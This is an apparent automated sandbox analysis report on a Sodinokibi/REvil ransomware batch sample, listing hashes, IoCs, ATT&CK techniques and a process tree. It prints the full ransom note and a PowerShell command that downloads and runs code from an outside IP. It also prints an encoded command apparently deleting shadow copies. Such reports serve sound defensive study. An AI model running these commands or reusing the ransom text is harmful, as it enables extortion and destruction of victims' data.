sodinokibi | c489438648791383b0506b31ec255a3f68b209bd6e897c5ab4cb789ffc519673

General

Target

d0333bd53e654eef1380155f828b71d5.bat
Size

219B
MD5

72cc00975d3f7dc5564c1a0fdbd1897b
SHA1

7eac1c6c294cf6a12495a484965884263cd77ff2
SHA256

c489438648791383b0506b31ec255a3f68b209bd6e897c5ab4cb789ffc519673
SHA512

9a76771f5f5e726113dca7e35c9ee71c4a2220e673c09b8fe48dd09385e1a2353d91a7002b198dbf136c03a435fa068657f6338a39f0095b148c8056cacf69e9

Score

10^/10

ransomware sodinokibi persistence

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/d0333bd53e654eef1380155f828b71d5

Extracted

Path

C:\80242-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 80242. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F95CCF8219484085 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/F95CCF8219484085 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: 4IQZZA2SGXoXFoHthXvp8yVePUq0p+NxB+qQXEDVeEAUkBFuj3BtrUEExOtYQDLz wb1pbUYU/RPNHiimzZUAoi21menF9wq2Tl03KQdoA+uu6S2+GNae4m32k7B4rCrj uOyaTWUpiFWN4PLPQUsAJqbOWqRgZqi5m9zts3F31y+zl7zx/sVwtH3gtnLrxwxA 02bbkdrm/Sv70uv6dQOqJIgS9C89+ttLGuppZfEC/cHjLPt8Pu7XeWiDK0LZai/t C4r27w8LwwuXBopJ+ykNJ+CJtF71qbnInvLHsmEbuw1hHgkWf5jF0CezBEudWQbB U8k3YM5uu1Mtvbxte8ZwnL5GZpEUnLysR7+2Y/MOz6FSw1GQEpZ/psnKHQ5WxE81 aqDem6CtuYdIawRcphxeoA5USq/HtNfx+v3thkFLY/NNHCtQPsvPdWsXGLcRj9GK AkF+yYfH3+qcja/ffVgwb4BeWqdarXKLLGDYt7j6aIr2F9DKYqfpwQcNsmFExX31 Om5EnhSfDt/SF3GUg+SMuzuzTjp65kTOMqGAcZXnw72Y+ImUcXwLQUsxHIsoPTf1 0vIFrVvXO12c0aSPi2zWeoSUpPIqKU/uY//tf6fr8yjI+87K9sI3aglTrLja+mry oOoc/ZufARwFz2rPf1koyqadRBpEfL16k3FwcZEUhdCROq3YrxtWN23UTsI+zQkS j+wTXTbTSum2/HJS3amUxrJGf+sXwQxkVGvTyg+HgFDKMzY6I0zmzXoJ/ors2PdW gzDprKmVR5Ww0Z7Sy3XZba4zwrzqWTeOCJS4s9dkwyHwlv9lWZ/PJ0jJoC0iAOaD +M1FMXHrMoo4Scd0mjAw6oTKipZ3PhNXI3IDgfKSsgRo9vodylRoglytmhNqeiHf eBysIpk2teqXL5kblnTT8O5JcRbWjAYXXuM8dqYo6VyIxMGzyqMl3CybdpArCKNe IyDUDOhNF8CytD+JULg5YcQrX+PtipRmnrqXLjfaeO/7EXy3+7QhfbPgWjLma/Au bYjIJQHXmt5ApTz0amHujiDCdX5jvDr4m7h84ZLfOKCUZIM0pJwukN7Kn479Ra1q VDOwAV4ToHslnHO3qZF9DuboQLGzEGKFrF40I9cxWsvjq1kNXtkF5FPy1LDUCG9b r5XifH1Dmi1ynNH1ClJMLrXl/Sjc2dAHYe7DVJa5TVTfAUodkVWvSf/a26Z42bDv kuWyzsGqd3D5PzneoixnDVNva4UNtEzS7qNafygtWbuo4Mk63tZuG7Mzyicx19yV HlsUlK6+vwRPUwtKiHoeCF/i5VuQkxK1SuRvUfR4 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F95CCF8219484085

http://decryptor.cc/F95CCF8219484085

Signatures

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Drops file in Program Files directory 25 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\TestShow.rtf	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\desktop\80242-readme.txt	powershell.exe
File created	\??\c:\program files (x86)\80242-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ConvertToSet.M2V	powershell.exe
File opened for modification	\??\c:\program files\GroupPublish.M2V	powershell.exe
File opened for modification	\??\c:\program files\MountRestart.mpv2	powershell.exe
File opened for modification	\??\c:\program files\RequestSearch.mpg	powershell.exe
File opened for modification	\??\c:\program files\StepEnter.php	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\80242-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\DisconnectExit.ppt	powershell.exe
File opened for modification	\??\c:\program files\ExportImport.wma	powershell.exe
File opened for modification	\??\c:\program files\ExportTest.mpg	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\80242-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\StopSwitch.i64	powershell.exe
File opened for modification	\??\c:\program files\ConnectConvertFrom.wmf	powershell.exe
File opened for modification	\??\c:\program files\EnterUse.3gp	powershell.exe
File opened for modification	\??\c:\program files\PingEdit.ppsx	powershell.exe
File opened for modification	\??\c:\program files\SetJoin.avi	powershell.exe
File opened for modification	\??\c:\program files\TraceComplete.css	powershell.exe
File opened for modification	\??\c:\program files\UnlockSet.mpp	powershell.exe
File opened for modification	\??\c:\program files\UnpublishSubmit.ogg	powershell.exe
File opened for modification	\??\c:\program files\UseSelect.ttf	powershell.exe
File created	\??\c:\program files\80242-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\EnterInitialize.mpeg2	powershell.exe
File opened for modification	\??\c:\program files\WatchUnblock.inf	powershell.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\pay7so6y.bmp"	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

1460 powershell.exe

pid	process
1460	powershell.exe

Blacklisted process makes network request 114 IoCs

Processes:

powershell.exe

flow	pid	process
3	1460	powershell.exe
7	1460	powershell.exe
9	1460	powershell.exe
10	1460	powershell.exe
12	1460	powershell.exe
14	1460	powershell.exe
16	1460	powershell.exe
17	1460	powershell.exe
19	1460	powershell.exe
20	1460	powershell.exe
22	1460	powershell.exe
23	1460	powershell.exe
25	1460	powershell.exe
27	1460	powershell.exe
29	1460	powershell.exe
31	1460	powershell.exe
33	1460	powershell.exe
34	1460	powershell.exe
36	1460	powershell.exe
37	1460	powershell.exe
40	1460	powershell.exe
41	1460	powershell.exe
43	1460	powershell.exe
44	1460	powershell.exe
46	1460	powershell.exe
47	1460	powershell.exe
49	1460	powershell.exe
50	1460	powershell.exe
52	1460	powershell.exe
54	1460	powershell.exe
55	1460	powershell.exe
57	1460	powershell.exe
59	1460	powershell.exe
60	1460	powershell.exe
63	1460	powershell.exe
65	1460	powershell.exe
66	1460	powershell.exe
68	1460	powershell.exe
69	1460	powershell.exe
71	1460	powershell.exe
73	1460	powershell.exe
75	1460	powershell.exe
76	1460	powershell.exe
78	1460	powershell.exe
80	1460	powershell.exe
82	1460	powershell.exe
85	1460	powershell.exe
86	1460	powershell.exe
88	1460	powershell.exe
90	1460	powershell.exe
92	1460	powershell.exe
94	1460	powershell.exe
95	1460	powershell.exe
97	1460	powershell.exe
99	1460	powershell.exe
101	1460	powershell.exe
102	1460	powershell.exe
104	1460	powershell.exe
105	1460	powershell.exe
107	1460	powershell.exe
108	1460	powershell.exe
110	1460	powershell.exe
112	1460	powershell.exe
113	1460	powershell.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	powershell.exe

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies extensions of user files 12 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\EditRepair.png => \??\c:\users\admin\pictures\EditRepair.png.80242	powershell.exe
File renamed	C:\Users\Admin\Pictures\LimitInvoke.tif => \??\c:\users\admin\pictures\LimitInvoke.tif.80242	powershell.exe
File renamed	C:\Users\Admin\Pictures\WatchEnter.raw => \??\c:\users\admin\pictures\WatchEnter.raw.80242	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\DisableExpand.tiff	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\StopGroup.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\EnterStop.raw => \??\c:\users\admin\pictures\EnterStop.raw.80242	powershell.exe
File renamed	C:\Users\Admin\Pictures\PublishUnblock.crw => \??\c:\users\admin\pictures\PublishUnblock.crw.80242	powershell.exe
File renamed	C:\Users\Admin\Pictures\HidePing.tiff => \??\c:\users\admin\pictures\HidePing.tiff.80242	powershell.exe
File renamed	C:\Users\Admin\Pictures\ResetRepair.raw => \??\c:\users\admin\pictures\ResetRepair.raw.80242	powershell.exe
File renamed	C:\Users\Admin\Pictures\StopGroup.tiff => \??\c:\users\admin\pictures\StopGroup.tiff.80242	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\HidePing.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\DisableExpand.tiff => \??\c:\users\admin\pictures\DisableExpand.tiff.80242	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 1296 wrote to memory of 1460	1296	cmd.exe	powershell.exe
PID 1296 wrote to memory of 1460	1296	cmd.exe	powershell.exe
PID 1296 wrote to memory of 1460	1296	cmd.exe	powershell.exe
PID 1296 wrote to memory of 1460	1296	cmd.exe	powershell.exe
PID 1460 wrote to memory of 1784	1460	powershell.exe	powershell.exe
PID 1460 wrote to memory of 1784	1460	powershell.exe	powershell.exe
PID 1460 wrote to memory of 1784	1460	powershell.exe	powershell.exe
PID 1460 wrote to memory of 1784	1460	powershell.exe	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	1460	powershell.exe
Token: SeDebugPrivilege	1460	powershell.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeBackupPrivilege	1608	vssvc.exe
Token: SeRestorePrivilege	1608	vssvc.exe
Token: SeAuditPrivilege	1608	vssvc.exe
Token: SeTakeOwnershipPrivilege	1460	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

1460 powershell.exe
1460 powershell.exe
1460 powershell.exe
1784 powershell.exe
1784 powershell.exe
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe

pid	process
1460	powershell.exe
1460	powershell.exe
1460	powershell.exe
1784	powershell.exe
1784	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\d0333bd53e654eef1380155f828b71d5.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1296

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d0333bd53e654eef1380155f828b71d5');Invoke-RCYSVVOUOPIT;Start-Sleep -s 10000"
2⤵
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Blacklisted process makes network request
- Modifies system certificate store
- Modifies extensions of user files
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in System32 directory
PID:1460

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1784

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1608

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Download Submit
memory/1460-5-0x0000000005240000-0x0000000005241000-memory.dmp

Filesize
4KB

Download
memory/1460-21-0x0000000006250000-0x0000000006251000-memory.dmp

Filesize
4KB

Download
memory/1460-22-0x00000000062E0000-0x00000000062E1000-memory.dmp

Filesize
4KB

Download
memory/1460-14-0x0000000006150000-0x0000000006151000-memory.dmp

Filesize
4KB

Download
memory/1460-13-0x00000000056F0000-0x00000000056F1000-memory.dmp

Filesize
4KB

Download
memory/1460-8-0x0000000005640000-0x0000000005641000-memory.dmp

Filesize
4KB

Download
memory/1460-0-0x0000000000000000-mapping.dmp

Download
memory/1460-4-0x00000000010D0000-0x00000000010D1000-memory.dmp

Filesize
4KB

Download
memory/1460-3-0x0000000004740000-0x0000000004741000-memory.dmp

Filesize
4KB

Download
memory/1460-2-0x0000000000E70000-0x0000000000E71000-memory.dmp

Filesize
4KB

Download
memory/1460-1-0x0000000074670000-0x0000000074D5E000-memory.dmp

Filesize
6.9MB

Download
memory/1784-23-0x0000000000000000-mapping.dmp

Download
memory/1784-25-0x0000000074670000-0x0000000074D5E000-memory.dmp

Filesize
6.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads